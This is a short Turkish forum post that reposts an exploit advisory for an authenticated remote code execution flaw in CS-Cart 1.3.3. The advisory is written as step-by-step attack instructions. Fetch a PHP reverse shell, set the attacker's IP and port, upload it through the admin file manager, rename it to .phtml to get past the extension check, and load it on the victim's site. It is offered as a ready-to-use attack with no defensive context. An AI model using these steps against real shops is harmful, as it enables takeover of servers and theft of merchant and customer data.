Hoşgeldin Misafir

CS-Cart 1.3.3 - authenticated RCE Vulnerability

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
CS-Cart 1.3.3 - authenticated RCE Vulnerability--


Kod:
# Exploit Title: CS-Cart authenticated RCE
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE
 
 
 
get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!
 
#  0day.today [2020-10-17]  #